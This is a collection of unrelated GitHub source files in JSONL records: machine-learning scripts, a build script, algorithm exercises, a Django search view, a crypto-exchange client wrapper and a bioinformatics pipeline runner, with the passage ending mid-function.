sum(col_filter, [])\nFEATURES = len(col_filter)\n\n\ndef activate(x):\n out = 1.0 / (1.0 + np.exp(x))\n return np.clip(out, 1e-8, 1-(1e-8))\n\ndef saver(weights, bias, modelFile):\n with open(modelFile, 'w') as of:\n w = csv.writer(of)\n w.writerow([bias])\n w.writerow(weights.tolist())\n\ndef loader(modelFile):\n with open(modelFile, 'r') as of:\n r = csv.reader(of)\n row = next(r)\n bias = float(row[0])\n row = next(r)\n weights = np.array([float(x) for x in row])\n return weights, bias\n\ndef saveOutput(arr, outputFile):\n with open(outputFile, 'w') as of:\n w = csv.writer(of)\n w.writerow([\"id\", \"label\"])\n w.writerows(arr)\n\ndef normalize(X_all, X_test):\n # Feature normalization with train and test X\n X_train_test = np.concatenate((X_all, X_test))\n mu = (sum(X_train_test) / X_train_test.shape[0])\n sigma = np.std(X_train_test, axis=0)\n mu = np.tile(mu, (X_train_test.shape[0], 1))\n sigma = np.tile(sigma, (X_train_test.shape[0], 1))\n X_train_test_normed = (X_train_test - mu) / sigma\n\n # Split to train, test again\n X_all = X_train_test_normed[0:X_all.shape[0]]\n X_test = X_train_test_normed[X_all.shape[0]:]\n return X_all, X_test\n\ndef readData(X_train, X_test, Y_train, col_filter=col_filter):\n x_d = np.genfromtxt(\n X_train,\n dtype=np.float32,\n skip_header=1,\n delimiter=',',\n usecols=col_filter)\n t_d = np.genfromtxt(\n X_test,\n dtype=np.float32,\n skip_header=1,\n delimiter=',',\n usecols=col_filter)\n y_d = np.genfromtxt(\n Y_train,\n dtype=np.float32,\n skip_header=1,\n delimiter=',')\n x_d, t_d = normalize(x_d, t_d)\n\n return x_d, t_d, y_d\n\ndef cleanReadData(X_train, X_test, Y_train, col_filter=col_filter):\n x_d = np.genfromtxt(\n X_train,\n dtype=np.float32,\n skip_header=1,\n delimiter=',',\n usecols=col_filter)\n t_d = np.genfromtxt(\n X_test,\n dtype=np.float32,\n skip_header=1,\n delimiter=',',\n usecols=col_filter)\n y_d = np.genfromtxt(\n Y_train,\n dtype=np.float32,\n skip_header=1,\n delimiter=',')\n\n return x_d, t_d, y_d\n","repo_name":"erred/ntu-ML2017FALL","sub_path":"hw2/iofn.py","file_name":"iofn.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"32795970803","text":"import Options\nfrom os import popen, unlink, symlink, getcwd\nfrom os.path import exists\nimport sys\n\nsrcdir = \".\"\nblddir = \"build\"\nVERSION = \"0.0.1\"\n\ndef set_options(opt):\n opt.tool_options(\"compiler_cxx\")\n\ndef configure(conf):\n conf.check_tool(\"compiler_cxx\")\n conf.check_tool(\"node_addon\")\n\ndef build(bld):\n obj = bld.new_task_gen(\"cxx\", \"shlib\", \"node_addon\")\n obj.target = \"uuid\"\n obj.find_sources_in_dirs(\"src\")\n # see http://www.mail-archive.com/programming@jsoftware.com/msg05886.html\n # Thanks to Elijah Insua\n # http://groups.google.com/group/nodejs/msg/442a49ce6f86d70d\n if sys.platform == 'darwin':\n obj.lib = [\"System\"]\n else:\n obj.lib = [\"uuid\"]\n\ndef shutdown(bld):\n # HACK to get binding.node out of build directory.\n # better way to do this?\n if Options.commands['clean']:\n if exists('uuid.node'): unlink('uuid.node')\n else:\n if exists('build/default/uuid.node') and not exists('uuid.node'):\n symlink(getcwd()+'/build/default/uuid.node', 'uuid.node')\n","repo_name":"weaver/uuidjs","sub_path":"wscript","file_name":"wscript","file_ext":"","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"} +{"seq_id":"32288370398","text":"#对称的二叉树\n\nfrom collections import deque \nclass TreeNode():\n def __init__(self,item):\n self._item = item\n self._left = None\n self._right = None\n self._father = None\n def __repr__(self):\n return self._item\n\n\nclass Tree():\n def __init__(self):\n self._root = None\n\n def bfs(self):\n ret = []\n queue = deque([self._root])\n while queue:\n node = queue.popleft()\n if node:\n ret.append(node._item)\n queue.append(node._left)\n queue.append(node._right)\n return ret\n\ndef symmetric_tree(tree_root1,tree_root2):\n if tree_root1 is None and tree_root2 is None:\n return True\n if tree_root1 is None or tree_root2 is None:\n return False\n if tree_root1._item != tree_root2._item:\n return False\n return symmetric_tree(tree_root1._left,tree_root2._right) and symmetric_tree(tree_root1._right,tree_root2._left)\n\n\nif __name__ == \"__main__\":\n node11 = TreeNode(8)\n node12 = TreeNode(6)\n node13 = TreeNode(6)\n node14 = TreeNode(5)\n node15 = TreeNode(7)\n node16 = TreeNode(7)\n node17 = TreeNode(5)\n node21 = TreeNode(8)\n node22 = TreeNode(6)\n node23 = TreeNode(9)\n node24 = TreeNode(5)\n node25 = TreeNode(7)\n node26 = TreeNode(7)\n node27 = TreeNode(5)\n node31 = TreeNode(7)\n node32 = TreeNode(7)\n node33 = TreeNode(7)\n node34 = TreeNode(7)\n node35 = TreeNode(7)\n node36 = TreeNode(7)\n node11._left = node12\n node11._right = node13\n node12._left = node14\n node12._right = node15\n node13._left = node16\n node13._right = node17\n node21._left = node22\n node21._right = node23\n node22._left = node24\n node22._right = node25\n node23._left = node26\n node23._right = node27\n node31._left = node32\n node31._right = node33\n node32._left = node34\n node32_right = node35\n node33._left = node36\n tree1 = Tree()\n tree1._root = node11\n tree2 = Tree()\n tree2._root = node21\n tree3 = Tree()\n tree3._root = node31\n print(tree1.bfs())\n print(tree2.bfs())\n print(tree3.bfs())\n print(symmetric_tree(node11,node11))\n print(symmetric_tree(node21,node21))\n print(symmetric_tree(node31,node31))\n \n","repo_name":"hongyesuifeng/python-algorithm","sub_path":"python-offer/question28.py","file_name":"question28.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"38132551507","text":"# load libraries\nfrom tkinter.messagebox import showerror\nfrom keras.preprocessing import image\nfrom keras.models import load_model\nfrom matplotlib.pyplot import text\nimport matplotlib.pyplot as plt\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nimport tensorflow_hub as hub\nfrom pyparsing import col\nimport tensorflow as tf\nfrom tkinter import ttk\nimport tkinter as tk\nfrom cv2 import cv2\nimport numpy as np\nimport os\nfrom sklearn.metrics import multilabel_confusion_matrix\nimport csv\n\n# root window\nroot = tk.Tk()\nroot.title('Hasil Identifikasi Wayang Kulit (Image Testing)')\nroot.geometry('400x700')\nroot.resizable(False, False)\n\n# frame\nframe = ttk.Frame(root)\n# field options\nopsi = {'padx':5, 'pady':5}\n\nmodel_path = 'model/wayang_model_new_fix.h5'\nwayang_model = tf.keras.models.load_model((model_path),custom_objects={'KerasLayer':hub.KerasLayer})\n\n# define variabel array untuk kelas wayang\nwayang_class = [\"abimanyu\", \"anoman\", \"arjuna\", \"bagong\", \"baladewa\", \"bima\", \"buta\", \"cakil\", \"durna\", \"dursasana\", \"duryudana\",\n \"gareng\", \"gatotkaca\", \"karna\", \"kresna\", \"nakula_sadewa\", \"patih_sabrang\", \"petruk\", \"puntadewa\", \"semar\", \"sengkuni\", \"togog\"\n]\n\n# utk csv\nkolom = [\"Data Aktual\", \"Data Prediksi\"]\n\ntk.Label(root,\n text=\"Hasil Penggujian\",\n font=\"Helvetica 12 bold\",\n fg=\"black\").pack()\n\ndef load_image(img_path, show=False):\n\n # akuisisi citra dan ubah ke citra edge, dengan size (224,224)\n img = cv2.imread(img_path)\n img = cv2.resize(img, (224,224))\n # cv2.imshow(\"Gambar\", img)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img = cv2.Canny(img, 100, 200)\n cv2.imwrite(\"simpan/citra_uji.jpg\", img)\n\n # ubah citra ke array dh expand_dims\n img = image.load_img(\"D:/Coding/IdentifikasiWayangKulit_TA/simpan/citra_uji.jpg\", target_size=(224, 224))\n img_tensor = image.img_to_array(img) # (height, width, channels)\n img_tensor = np.expand_dims(img_tensor, axis=0) # (1, height, width, channels), add a dimension because the model expects this shape: (batch_size, height, width, channels)\n img_tensor /= 255. # imshow expects values in the range [0, 1]\n\n if show:\n plt.imshow(img_tensor[0]) \n plt.axis('off')\n plt.show()\n\n return img_tensor\n\ncurrdir = os.getcwd()\nfile_path = filedialog.askdirectory(initialdir=currdir, title='Please Select a Directory Raw Dataset')\n\n#path=os.path.dirname(file_path)\n\nbenar = 0\nsalah = 0\n\ndata_akt = []\ndata_pred = []\n\nfor sub_class in os.listdir(file_path):\n sub_fold = os.path.join(file_path,sub_class)\n for images in os.listdir(os.path.join(file_path,sub_fold)):\n \n new_image = load_image(os.path.join(sub_fold, images))\n\n # check prediction dari citra uji\n pred = wayang_model.predict(new_image)\n\n if pred is not None:\n\n # variabel untuk menampung hasil prediksi + presentase kemiripan\n top = np.argsort(pred[0])[:-4:-1]\n hasil = \"{}\".format(wayang_class[top[0]])+\" ({:.2})\".format(pred[0][top[0]])\n nama_wayang = \"{}\".format(wayang_class[top[0]])\n\n data_akt.append(sub_class)\n data_pred.append(nama_wayang)\n\n # cek apakah nama folder sesuai dengan hasil prediksi\n if sub_class == nama_wayang:\n print('Benar',images, sub_class, hasil)\n benar += 1\n else:\n print('salah',images, sub_class, hasil)\n salah += 1\n\n\ntotal = salah+benar\n# persen = (benar/total)*100\n\nprint(\"data aktual: \",data_akt)\nprint(\"\\n\")\nprint(\"data prediksi: \",data_pred)\nprint(\"\\n\")\n\n# confusion matriks multi-class classification\nconf_m = multilabel_confusion_matrix(data_akt, data_pred, labels=wayang_class)\n\nfor i in range(22):\n \n TP = conf_m[i][0][0]\n FP = conf_m[i][0][1]\n FN = conf_m[i][1][0]\n TN = conf_m[i][1][1]\n\n Akurasi = (TP+TN)/(TP+FP+FN+TN)\n Presisi = TP/(TP+FP)\n Recall = TP/(TP+FN)\n\n print(wayang_class[i]+\" | akurasi: {:.2}\".format(Akurasi)+\" presisi: {:.2}\".format(Presisi)+\" recall: {:.2}\".format(Recall))\n print(conf_m[i])\n\n tk.Label(root,\n text=wayang_class[i],\n font=\"Helvetica 12\",\n fg=\"blue\").pack(anchor=\"w\")\n\n tk.Label(root,\n text=\"Akurasi - {:.2}\".format(Akurasi)+\" presisi: {:.2}\".format(Presisi)+\" recall: {:.2}\".format(Recall),\n font=\"Helvetica 10\",\n fg=\"black\").pack(anchor=\"w\")\n\n# import csv\nwith open('prediksi.csv', 'w', encoding='UTF8', newline='') as f:\n writer = csv.writer(f)\n\n writer.writerow(kolom)\n\n writer.writerows([data_akt])\n writer.writerows([data_pred])\n# print([data_akt])\n\nroot.mainloop()","repo_name":"SandingRiyanto/IdentifikasiWayangKulit_TA","sub_path":"pengujian.py","file_name":"pengujian.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"36419322881","text":"import collections\nimport math\n\nfrom django.http import Http404\nfrom django.shortcuts import render\n\nfrom .search import search_query, search_single_dataset, more_like\n\nfrom stats.models import StatRecord\n\ndef view_dataset(request, slug):\n dataset = search_single_dataset(slug)\n if not dataset:\n raise Http404()\n\n StatRecord.record_now(\n dataset['organisation']['id'],\n dataset['id'],\n dataset['title'],\n 'view'\n )\n\n more = more_like(dataset)\n\n return render(request, 'dataset/view.html', { 'dataset': dataset, 'more': more })\n\n\nFILTERS = {\n 'organisation': 'organisation_name',\n 'publisher': 'organisation_name'\n}\n\ndef search(request):\n query = request.GET.get('q')\n\n page = 1\n try:\n page = int(request.GET.get('page'))\n except:\n page = 1\n\n applied_filters = {}\n filters = {}\n for k, v in FILTERS.items():\n val = request.GET.get(k)\n if val:\n filters[v] = val\n applied_filters[k] = val\n\n page_size = 20\n\n datasets, total = search_query(query, filters=filters, offset=(page * page_size) - page_size, limit=page_size)\n page_count = math.ceil(float(total) / page_size)\n\n if query:\n StatRecord.record_bulk_now(\n [d['organisation']['id'] for d in datasets],\n [d['id'] for d in datasets],\n [d['title'] for d in datasets],\n 'search'\n )\n\n organisations = collections.OrderedDict()\n organisations['cabinet-office'] = 'Cabinet Office'\n\n\n\n return render(request, 'dataset/search.html', {\n 'organisations': organisations,\n 'applied_filters': applied_filters,\n 'datasets': datasets,\n 'total': total,\n 'page_count': page_count,\n 'page_range': range(1, page_count+1),\n 'current_page': page,\n 'q': query or \"\"\n })\n","repo_name":"datagovuk/find_data_alpha","sub_path":"src/dataset/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"19443249174","text":"#User function Template for python3\n\ndef reverseWord(s):\n characters = s.split()\n rev_characters=[char[::-1] for char in characters]\n reverseWord=\" \".join(rev_characters)\n \n return reverseWord\n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__ == \"__main__\":\n t = int(input())\n while(t>0):\n s = input()\n print(reverseWord(s))\n t = t-1\n\n# } Driver Code Ends","repo_name":"htcmansi/LeetCode-Solutions","sub_path":"Reverse a String - GFG/reverse-a-string.py","file_name":"reverse-a-string.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"38392475354","text":"import psycopg2\n\n# Connect to the database\nconn = psycopg2.connect(\n host=\"hostname\",\n database=\"database_name\",\n user=\"username\",\n password=\"password\"\n)\n\n# Create a cursor object\ncur = conn.cursor()\n\n# Execute the query\nquery = \"\"\"\nSELECT zavarovanec.kzzs, diagnoza.slovensko_ime\nFROM zavarovanec\nLEFT JOIN obravnava ON zavarovanec.kzzs = obravnava.kzzs\nLEFT JOIN diagnoza ON obravnava.st_obravnave = diagnoza.st_obravnave\nORDER BY obravnava.cas_zacetka DESC;\n\"\"\"\ncur.execute(query)\n\n# Fetch and print the results\nresults = cur.fetchall()\nfor row in results:\n print(row)\n\n# Close the cursor and connection\ncur.close()\nconn.close()","repo_name":"al-pi314/data_managment_technologies","sub_path":"nosql/postgresql.py","file_name":"postgresql.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"31787680883","text":"import logging\nfrom typing import Optional\n\nfrom exch.huobi.hbdm.HuobiRestClient import HuobiRestClient\nfrom exch.huobi.hbdm.HuobiWebSocketClient import HuobiWebSocketClient\nfrom exch.huobi.hbdm.broker.HuobiBrokerHbdm import HuobiBrokerHbdm\nfrom exch.huobi.hbdm.feed.HuobiCandlesFeedHbdm import HuobiCandlesFeedHbdm\nfrom exch.huobi.hbdm.feed.HuobiWebSocketFeedHbdm import HuobiWebSocketFeedHbdm\n\n\nclass HuobiExchangeHbdm:\n \"\"\" Huobi derivatives market exchange: futures, swaps \"\"\"\n\n def __init__(self, config: dict):\n \n self.config = config\n self.__rest_client: Optional[HuobiRestClient] = None\n self.__websocket_client_market: Optional[HuobiWebSocketClient] = None\n self.__websocket_client_broker: Optional[HuobiWebSocketClient] = None\n\n self.__websocket_feed: Optional[HuobiWebSocketFeedHbdm] = None\n self.__candles_feed: Optional[HuobiCandlesFeedHbdm] = None\n\n self.__broker: Optional[HuobiBrokerHbdm] = None\n\n def _key_secret(self):\n key = self.config[\"pytrade2.exchange.huobi.connector.key\"]\n secret = self.config[\"pytrade2.exchange.huobi.connector.secret\"]\n return key, secret\n\n def broker(self):\n\n if not self.__broker:\n self.__broker = HuobiBrokerHbdm(self.config,\n rest_client=self._rest_client(),\n ws_client=self._websocket_client_broker(),\n ws_feed=self.websocket_feed())\n return self.__broker\n\n def candles_feed(self):\n if not self.__candles_feed:\n self.__candles_feed = HuobiCandlesFeedHbdm(self.config,\n self._rest_client(),\n self._websocket_client_market())\n return self.__candles_feed\n\n def websocket_feed(self) -> HuobiWebSocketFeedHbdm:\n \"\"\" Binance websocket feed lazy creation \"\"\"\n if not self.__websocket_feed:\n self.__websocket_feed = HuobiWebSocketFeedHbdm(config=self.config,\n rest_client=self._rest_client(),\n ws_client=self._websocket_client_market())\n return self.__websocket_feed\n\n def _websocket_client_market(self) -> HuobiWebSocketClient:\n if not self.__websocket_client_market:\n # wss://api.hbdm.com/swap-ws\n key, secret = self._key_secret()\n self.__websocket_client_market = HuobiWebSocketClient(host=\"api.hbdm.com\",\n path=\"/linear-swap-ws\",\n access_key=key,\n secret_key=secret,\n be_spot=False, is_broker=False)\n return self.__websocket_client_market\n\n def _websocket_client_broker(self) -> HuobiWebSocketClient:\n if not self.__websocket_client_broker:\n key, secret = self._key_secret()\n self.__websocket_client_broker = HuobiWebSocketClient(host=\"api.hbdm.com\",\n path=\"/linear-swap-notification\",\n access_key=key,\n secret_key=secret,\n be_spot=False, is_broker=True)\n return self.__websocket_client_broker\n\n def _rest_client(self):\n if not self.__rest_client:\n self.__rest_client = HuobiRestClient(*self._key_secret())\n return self.__rest_client\n","repo_name":"DmitryPukhov/pytrade2","sub_path":"pytrade2/exch/huobi/hbdm/HuobiExchangeHbdm.py","file_name":"HuobiExchangeHbdm.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"71"} +{"seq_id":"25430446740","text":"# -*- coding: utf-8 -*-\n__author__ = 'zhyq'\n\nimport os\n\n# app path\nCUR_PATH = os.path.dirname(os.path.abspath(__file__))\n\n# app start status\nDEBUG = False\n\nif os.path.exists(os.path.join(CUR_PATH, '__test__')):\n DEBUG = True\n","repo_name":"wecatch/app-turbo","sub_path":"demos/conf/global_setting.py","file_name":"global_setting.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"71"} +{"seq_id":"42816422639","text":"import os, sys, getopt\nimport sqlite3\nfrom datetime import datetime\nfrom utils.db import DbException\nfrom tokens.lexer import Lexer\nfrom tokens.preparser import PreParser\nfrom tokens.tokenizer import Tokenizer, tokenize\n\n\nHELP = 'Usage:\\npython tpaths_add_one_missing.py --dbpath=\"\" --pathid=\\n'\n\ndef add_one_missing(conn: sqlite3.Connection, id: int):\n \"\"\"Adds missing `tokens` and `token_paths` of a single unlabelled string referenced by a path.\"\"\"\n \n print(f\"start:\\t{datetime.now()}\")\n\n c = conn.cursor()\n\n # Create function-token xrefs table\n c.execute('''CREATE TABLE IF NOT EXISTS token_paths (\n path_id INTEGER NOT NULL,\n func_addr INTEGER NOT NULL,\n string_addr INTEGER NOT NULL,\n token_literal TEXT NOT NULL,\n names_func INTEGER)''')\n\n try:\n c.execute(\"SELECT * FROM paths WHERE id = ?\", (id,))\n path = c.fetchone()\n # 'no such table: x'\n except sqlite3.OperationalError as ex:\n print(ex)\n sys.exit()\n\n if path is None:\n print(\"Invalid path id\")\n sys.exit()\n\n func_addr = path[1]\n string_addr = path[2]\n\n try:\n c.execute(\"SELECT literal FROM strings WHERE address = ?\", (string_addr,))\n string_literal = c.fetchone()\n # 'no such table: x'\n except sqlite3.OperationalError as ex:\n print(ex)\n sys.exit()\n\n if string_literal is None:\n print(\"Referenced string doesn't exist in the database\")\n sys.exit()\n\n string_literal = string_literal[0]\n\n lexer = Lexer(\"\")\n parser = PreParser([])\n tokenizer = Tokenizer([])\n\n tokens = tokenize(string_literal, lexer, parser, tokenizer)\n\n for token in tokens:\n try:\n try:\n c.execute(\"INSERT INTO tokens (string_addr,literal) VALUES (?,?)\", (string_addr, token.token))\n # UNIQUE contraint failed: tokens.literal - skip duplicates\n except sqlite3.IntegrityError:\n print(f\"Duplicate token: {token.token}\")\n\n c.execute(\"INSERT INTO token_paths (path_id,func_addr,string_addr,token_literal) VALUES (?,?,?,?)\", (id, func_addr, string_addr, token.token))\n # 'no such table: token_paths'\n except sqlite3.OperationalError as ex:\n print(ex)\n sys.exit()\n\n print(f\"end:\\t{datetime.now()}\")\n\n conn.commit()\n\ndef main(argv):\n db_path = \"\"\n id = \"\"\n opts, args = getopt.getopt(argv,\"hdp:\",[\"dbpath=\", \"pathid=\"])\n for opt, arg in opts:\n if opt == '-h':\n print(HELP)\n sys.exit()\n elif opt in (\"-d\", \"--dbpath\"):\n db_path = arg\n elif opt in (\"-p\", \"--pathid\"):\n id = arg\n\n if db_path == \"\":\n raise DbException(f\"SQLite database path required\\n{HELP}\")\n if not os.path.isfile(db_path):\n raise DbException(f\"Database not found at {db_path}\")\n \n conn = sqlite3.connect(db_path)\n add_one_missing(conn, int(id))\n conn.close()\n \n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"michal-kapala/dubRE","sub_path":"scripts/tpaths_add_one_missing.py","file_name":"tpaths_add_one_missing.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"33780104517","text":"import os\r\nimport subprocess\r\nfrom subprocess import PIPE \r\nimport common\r\n\r\nclass apprun:\r\n def __init__(self, config):\r\n self.cfg = config\r\n \r\n def printMsgLine(self, msg = ''):\r\n lines = msg.splitlines()\r\n for l in lines:\r\n print(' >', l)\r\n\r\n def execCmd(self, cmd, verbose = False):\r\n print('Run: >', cmd)\r\n proc = subprocess.run(cmd, stdout=PIPE, stderr=PIPE, text=True, shell=True)\r\n if proc.returncode:\r\n print('Error:')\r\n self.printMsgLine(proc.stderr)\r\n print('')\r\n return False\r\n else:\r\n if verbose:\r\n self.printMsgLine(proc.stdout)\r\n else:\r\n self.printMsgLine('Completed.')\r\n print('')\r\n return True\r\n \r\n def runRScript(self, script, output = '', args = []):\r\n cmd = 'R --no-save --slave --vanilla'\r\n if len(args):\r\n cmd += ' --args'\r\n for arg in args:\r\n cmd += ' ' + str(arg)\r\n cmd += ' < ' + script\r\n if os.path.exists(output):\r\n cmd += ' > ' + output\r\n print('Run: >', cmd)\r\n proc = subprocess.run(cmd, stdout=PIPE, stderr=PIPE, text=True, shell=True)\r\n if proc.returncode:\r\n print('Error:')\r\n self.printMsgLine(proc.stderr)\r\n print('')\r\n return False\r\n else:\r\n self.printMsgLine(proc.stdout)\r\n self.printMsgLine('Completed.')\r\n print('')\r\n return True\r\n\r\n def downloadSRA(self, srid, output = '.', option = {'thread':8}):\r\n os.chdir(self.cfg.TEMPORAL)\r\n cmd = 'fasterq-dump ' + srid + ' -O ' + output\r\n if option['thread']:\r\n cmd += ' -e ' + str(option['thread'])\r\n return self.execCmd(cmd)\r\n\r\n def runCutter(self, adaptor = '', site = '', input = '', output = ''):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'cutadapt'\r\n if site == '5p':\r\n cmd += ' -g'\r\n elif site == '3p':\r\n cmd += ' -a'\r\n elif site == 'both':\r\n cmd += ' -b'\r\n cmd += ' ' + adaptor + ' ' + input + ' > ' + output\r\n return self.execCmd(cmd)\r\n \r\n def runFastQC(self, input = '', output = ''):\r\n common.addPath(os.path.join(self.cfg.APPS_DIR, 'FastQC'))\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'fastqc -o ' + output + ' ' + input + ' &'\r\n return self.execCmd(cmd)\r\n\r\n def runFastQFilter(self, input = '', output = '', param = {}):\r\n common.addPath(self.cfg.APPS_DIR)\r\n dir, name = os.path.split(input)\r\n os.chdir(dir)\r\n cmd = 'fastp -i ' + input + ' -o ' + output\r\n if 'min_qual' in param:\r\n cmd += ' -q ' + str(param['min_qual'])\r\n if 'min_len' in param:\r\n cmd += ' -l ' + str(param['min_len'])\r\n if 'min_complex':\r\n cmd += ' -y -Y ' + str(param['min_complex'])\r\n if 'thread' in param:\r\n cmd += ' -w ' + str(param['thread'])\r\n return self.execCmd(cmd)\r\n \r\n def makeRGText(self, rginfo):\r\n rg = 'ID:' + rginfo['ID']\r\n for key in rginfo:\r\n if key != 'ID':\r\n rg += '\\\\t' + key + ':' + rginfo[key]\r\n return rg\r\n\r\n def hasFai(self, ref):\r\n return os.path.exists(ref+'.fai')\r\n\r\n def makeFai(self, ref):\r\n cmd = 'samtools faidx ' + ref\r\n return self.execCmd(cmd)\r\n\r\n def hasBWARefIndex(self, name):\r\n return os.path.exists(os.path.join(self.cfg.REFERENCE_DIR, name+'.pac'))\r\n\r\n def makeBWARefIndex(self, refpath, name):\r\n cmd = 'bwa index -p ' + os.path.join(self.cfg.REFERENCE_DIR, name) + ' ' + refpath\r\n return self.execCmd(cmd)\r\n \r\n def runBWA(self, seqtype='single', input=[], ref='', output='', \\\r\n option={'thread':8, 'checksr':True, 'refpath':None, 'addRG':False, 'rgroup':{}}):\r\n common.addPath(self.cfg.APPS_DIR)\r\n if not self.hasFai(option['refpath']):\r\n res = self.makeFai(option['refpath'])\r\n if not res:\r\n print(' Reference index (.fai) construction error.')\r\n return\r\n if not self.hasBWARefIndex(ref):\r\n res = self.makeBWARefIndex(option['refpath'], ref)\r\n if not res:\r\n print(' Reference transform error.')\r\n return\r\n cmd = 'bwa mem '\r\n if 'thread' in option:\r\n cmd += '-t '+str(option['thread'])\r\n if 'checksr' in option:\r\n cmd += ' -M'\r\n if 'addRG' in option and option['addRG']:\r\n cmd += ' -R \"@RG\\\\t' + self.makeRGText(option['rgroup']) + '\"'\r\n cmd += ' '+ref\r\n cmd += ' ' + input[0]\r\n if len(input) == 2 and os.path.exists(input[1]) and seqtype == 'paired':\r\n cmd += ' ' + input[1]\r\n cmd += ' > ' + output\r\n os.chdir(self.cfg.REFERENCE_DIR)\r\n return self.execCmd(cmd)\r\n\r\n def hasBowtRefIndex(self, refname):\r\n return os.path.exists(os.path.join(self.cfg.REFERENCE_DIR, refname + '.bt2'))\r\n\r\n def makeBowtRefIndex(self, refpath, refname, thread = 8):\r\n os.chdir(self.cfg.REFERENCE_DIR)\r\n cmd = 'bowtie2-build' + ' --threads ' + str(thread) + ' -f ' + refpath + ' ' + refname\r\n return self.execCmd(cmd)\r\n \r\n def runBowtie2(self, seqtype='single', input=[], ref='', output='', \\\r\n option={'thread':8, 'checksr':True, 'refpath':None, 'addRG':False, 'rgroup':{}}):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n if not self.hasFai(option['refpath']):\r\n res = self.makeFai(option['refpath'])\r\n if not res:\r\n print(' Reference index (.fai) construction error.')\r\n return\r\n if not self.hasBowtRefIndex(ref):\r\n res = self.makeBowtRefIndex(option['refpath'], ref, option['thread'])\r\n os.chdir(self.cfg.WORK_SPACE)\r\n if not res:\r\n print(' Reference index construction error.')\r\n return\r\n cmd = 'bowtie2'\r\n if 'addRG' in option and option['addRG']:\r\n cmd += ' --rg-id ' + option['rgroup']['ID']\r\n for key in option['rgroup']:\r\n if key != 'ID':\r\n cmd += ' --rg ' + key + ':' + option['rgroup'][key]\r\n if seqtype == 'single' and os.path.exists(input[0]):\r\n cmd += ' -U '+input[0]\r\n elif seqtype == 'paired-end' and len(input) == 2 and \\\r\n os.path.exists(input[0]) and os.path.exists(input[1]):\r\n cmd += ' -1 '+input[0] + ' -2 '+input[1]\r\n if option['thread']:\r\n cmd += ' -p '+str(option['thread'])\r\n cmd += ' -x ' + ref + ' -S '+ output\r\n os.chdir(self.cfg.REFERENCE_DIR)\r\n return self.execCmd(cmd)\r\n\r\n def hasSTARRefIndex(self, refdir):\r\n return os.path.exists(refdir)\r\n\r\n def makeSTARRefIndex(self, refpath='', refname='', \\\r\n option={'thread':8, 'annotate':True, 'annotation':None}):\r\n cmd = 'STAR --runMode genomeGenerate' + \\\r\n ' --genomeDir ' + os.path.join(self.cfg.REFERENCE_DIR, refname) + ' --genomeFastaFiles ' + refpath\r\n if 'annotate' in option and option['annotate'] and os.path.exists(option['annotation']):\r\n cmd += ' --sjdbGTFfile ' + option['annotation']\r\n if option['thread']:\r\n cmd += ' --runThreadN ' + str(option['thread'])\r\n return self.execCmd(cmd)\r\n\r\n def runSTAR(self, seqtype='single', input=[], ref='', output='', \\\r\n option={'thread':8, 'annotate':True, 'annotation':None, 'refpath':None}):\r\n common.addPath(self.cfg.APPS_DIR)\r\n os.chdir(self.cfg.WORK_SPACE)\r\n if not self.hasFai(option['refpath']):\r\n res = self.makeFai(option['refpath'])\r\n if not res:\r\n print(' Reference index (.fai) construction error.')\r\n return\r\n if not self.hasSTARRefIndex(os.path.join(self.cfg.REFERENCE_DIR, ref)):\r\n self.makeSTARRefIndex(refpath = option['refpath'], refname = ref, option = option)\r\n cmd = 'STAR --outSAMtype BAM SortedByCoordinate' + \\\r\n ' --genomeDir ' + os.path.join(self.cfg.REFERENCE_DIR, ref)\r\n cmd += ' --readFilesIn'\r\n for f in input:\r\n cmd += ' ' + f \r\n if option['thread']:\r\n cmd += ' --runThreadN ' + str(option['thread'])\r\n cmd += ' --outFileNamePrefix ' + output\r\n return self.execCmd(cmd)\r\n\r\n def runSamtool2Fq(self, seqtype='single', input='', outdir='', outname = ''):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n if seqtype == 'single':\r\n cmd = 'samtools fastq ' + input + ' > ' + os.path.join(outdir, outname + '.fq')\r\n else:\r\n cmd = 'samtools collate -u -O ' + input + ' | samtools fastq '\r\n cmd += ' -1 ' + os.path.join(outdir, outname + '_1.fq')\r\n cmd += ' -2 ' + os.path.join(outdir, outname + '_2.fq')\r\n cmd += ' -0 /dev/null -s /dev/null -n'\r\n return self.execCmd(cmd)\r\n\r\n def runSamtool2BAM(self, input='',output='',option={}):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'samtools view'\r\n if 'thread' in option:\r\n cmd += ' -@ '+str(option['thread'])\r\n cmd += ' -b -o '+ os.path.join(self.cfg.OUT_DIR, output)+' ' + input\r\n return self.execCmd(cmd)\r\n\r\n def runSamtoolSort(self, input='', output='', option = {}):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'samtools sort -l1 -T tmp'\r\n if 'thread' in option:\r\n cmd += ' -@ 